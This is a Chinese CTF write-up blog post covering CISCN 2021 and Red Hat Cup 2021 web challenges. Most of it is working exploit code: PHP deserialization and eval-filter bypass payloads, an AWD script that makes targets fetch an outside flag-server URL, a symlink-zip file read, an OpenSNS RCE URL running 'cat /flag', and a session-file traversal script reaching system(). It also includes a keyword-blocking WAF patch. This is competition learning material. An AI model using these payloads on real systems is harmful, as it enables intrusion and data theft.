CTF笔记(十六)——CISCN 2021 华中part&final 红帽杯 2021 final WEB WriteUp

内容纲要

CISCN 2021 华中part&final 红帽杯 2021 final WEB WriteUp

CISCN 2021

华中分区赛

web1

<?php
    $username  = "flag_is_my_life";
    $password  = "I_won't_tell_you_it's_here";
    $replacement = "Unless you trade in gold";
    include "flag.php";
    $give_me = isset($_GET['give_me'])? $_GET['give_me']: "" ;
    $data = unserialize($give_me);
    if ($data['username']==$username&&$data['password']==$password&&strcmp($data['replace'], $replace)==0){
        echo $flag;
    }else{
        echo "Flag is my life, you can't take it from me!";
    }
?>

payload:

login.php?give_me=a:3:{s:7:"replace";a:0:{}s:8:"username";s:15:"flag_is_my_life";s:8:"password";s:26:"I_won't_tell_you_it's_here";}

本地测试:

file

web3

<?php 

if(!isset($_GET['str'])){
    show_source(__FILE__);
    die();
}
#GOAL: gather some phpinfo();

$str=@(string)$_GET['str'];
include "check.php";
@eval('$str="'.addslashes($str).'";');

//hint:flag in flag.php

过滤字符列表:

 +0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz|

尝试异或取反来绕过正则,比如下面这个

看phpinfo:

?str=${(~(%8f%97%8f%96%91%99%90))()}

拿flag:

?str=${(~%8c%97%90%88%a0%8c%90%8a%8d%9c%9a)((~%99%93%9e%98%d1%8f%97%8f))}

本地测试:

file

final总决赛

AWD web4

requests.post(url.format(target=eachTarget)+"/admin",data="redirect=%2Ffilemanager%2Fedit%2Fimg%3Ffile%3D%252Fdesign%252Fbg.png%26url%3Dhttp%253A%252F%252Fflagserver.top%252Findex.php%253Ftoken%253D162_USR-20210716-alHLz&username=admin%40admin.com&password=admin%40admin.com",headers={"Cookie":"elefant_user=4jcv6nc3bre3of7dd1pqd0s0m5","Content-Type":"application/x-www-form-urlencoded"})
res=requests.get(url.format(target=eachTarget)+"/files/design/bg.png")
flags=re.findall("[a-z0-9]{32}",res.text.replace("\n","").replace(" ",""))
print(flags)

Break+Fix babyPython

垃圾环境还我500分

这是原题来着,2018年的,通过符号链接任意文件读取+flask session伪造做的

ln -s /proc/self/environ 1
zip -y 1 1

上传拿到环境变量,里面告诉我们文件在/app下,并且有个ini文件叫做啥you find it

读取这个ini,得到unicorn server起的模块名,即python程序文件路径

读取python程序,发现用uuid初始化的random种子,uuid是mac地址的10进制

读/proc/self/net/arp得知网卡是eth0

读/sys/class/net/eth0/address得到网卡地址

用github上得session flask address伪造cookie

篡改cookie访问即可获得flag

ezpython

这是easypython的wp
https://inhann.top/2021/07/22/ciscn2021_easypython/

红帽杯 2021

决赛

openSNS

已知漏洞,payload:

http://172.16.9.2:9006/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(%27cat%20/flag%27)

patch我直接首页加的过滤

//reset_session_path();  //如果您的服务器无法安装或者无法登录,又或者后台验证码无限错误,请尝试取消本行起始两条左斜杠,让本行代码生效,以修改session存储的路径
function waf($array){
    foreach ($array as $key => $value) {
        if(preg_match("/ph|<\?|system|exec|eval|shell/i",$key)){
            die("damm!hacker!");
        }
        if(is_array($value)){
            waf($value);
        }
        else if(preg_match("/ph|<\?|system|exec|eval|shell/i",$value)){
            die("damm!hacker!");
        }
    }
}
waf($_POST);
waf($_REQUEST);
waf($_GET);

upload

ReflectionFunction我是真滴不知道啊,不能上网打个球,“学网络没网不如学超算”

index.php部分源码如下:

<?php
include('class.php');
ini_set("display_errors","on");
ini_set("error_reporing","E_ALL");
if(!(isset($_SESSION['func']))) {
    $_SESSION['func'] = 'showfile';
}
if(!(isset($_SESSION['files']))) {
    $_SESSION['files'] = array();
}
if(!(isset($_SESSION['paths']))) {
    $_SESSION['paths'] = array();
}

if(isset($_POST['filename'])&&isset($_POST['content'])){
    if(stristr($_POST['filename'], 'h')){
        die('no h!');
    }
    $filepath = './files/'.$_POST['filename'];
    $filename = basename($_POST['filename']);
    $a=file_put_contents($filepath,$_POST['content']);
    echo var_dump($a);
    $_SESSION['files'][$filename] = $filepath;
    $_SESSION['paths'][$filepath] = 'file';
    header('Location:/?file='.$filename);

}

if(rand(0,2)>1){
    $showfile = 'red';
}
else{
    $showfile ='green';
}
$filelist = array();
foreach ($_SESSION['paths'] as $path=>$class){
    $temp = new $class($path);
    if($class=='file'){
        $filelist[] = (string)$temp;
    }
    else{
        $filelist[] = $temp;
    }
}
$out = '<p>your file:';

foreach ($filelist as $value){
    $out .= $value.' ';
}
echo $out.'</p>';

if(isset($_GET['file'])){
    if(isset($_SESSION['files'][$_GET['file']])) {
        $pathinfo = array($_GET['file']=>$_SESSION['files'][$_GET['file']]);
        ${$_SESSION['func']}($pathinfo);
    }
    else{
        echo 'no such file!';
    }
}
?>

$filepath直接拼接的,可以目录超越任意文件写

给了phpinfo可以得到session路径,就算没给一般要么/tmp要么/var/lib/php/sessions

写session实现对$_SESSION的控制

本地搭服务运行如下代码

<?php
session_start();
$_SESSION["func"]='filelist';
$_SESSION['files']=array("var_dump"=>"./files/var_dump","invokeArgs"=>"ls /");
$_SESSION['paths']=array("system"=>"ReflectionFunction","./files/invokeArgs"=>"file");

查看session文件得到序列化后的session数据

func|s:8:"filelist";files|a:2:{s:8:"var_dump";s:16:"./files/var_dump";s:10:"invokeArgs";s:4:"ls /";}paths|a:2:{s:6:"system";s:18:"ReflectionFunction";s:18:"./files/invokeArgs";s:4:"file";}

把上面得到的序列化后的session给他写到服务器上的session文件中去,然后访问令其实现命令执行

import requests

header={
"Content-Type": """application/x-www-form-urlencoded""",
"User-Agent": """Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 Edg/91.0.864.71""",
"Accept": """text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9""",
"Accept-Encoding": """gzip, deflate""",
"Accept-Language": """zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6""",
"Cookie": """PHPSESSID=123"""}

sess_123="func%7Cs%3A8%3A%22filelist%22%3Bfiles%7Ca%3A2%3A%7Bs%3A8%3A%22var_dump%22%3Bs%3A16%3A%22.%2Ffiles%2Fvar_dump%22%3Bs%3A10%3A%22invokeArgs%22%3Bs%3A4%3A%22ls%20%2F%22%3B%7Dpaths%7Ca%3A2%3A%7Bs%3A6%3A%22system%22%3Bs%3A18%3A%22ReflectionFunction%22%3Bs%3A18%3A%22.%2Ffiles%2FinvokeArgs%22%3Bs%3A4%3A%22file%22%3B%7D"

res=requests.post("http://127.0.0.1:9000/?file=filename",headers=header,data=f"filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fsess_123&content={sess_123}",allow_redirects=False)
res=requests.post("http://127.0.0.1:9000/?file=filename",headers=header,data=f"filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fsess_123&content={sess_123}",allow_redirects=False)
res=requests.get("http://127.0.0.1:9000/?file=invokeArgs",headers=header,allow_redirects=False)
print(res.text)

将 ls / 换成 cat /flag 获取flag

patch的话将${$_SESSION[‘func’]}写死成$showfile即可。

不说点什么喵?

13 + 10 =

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据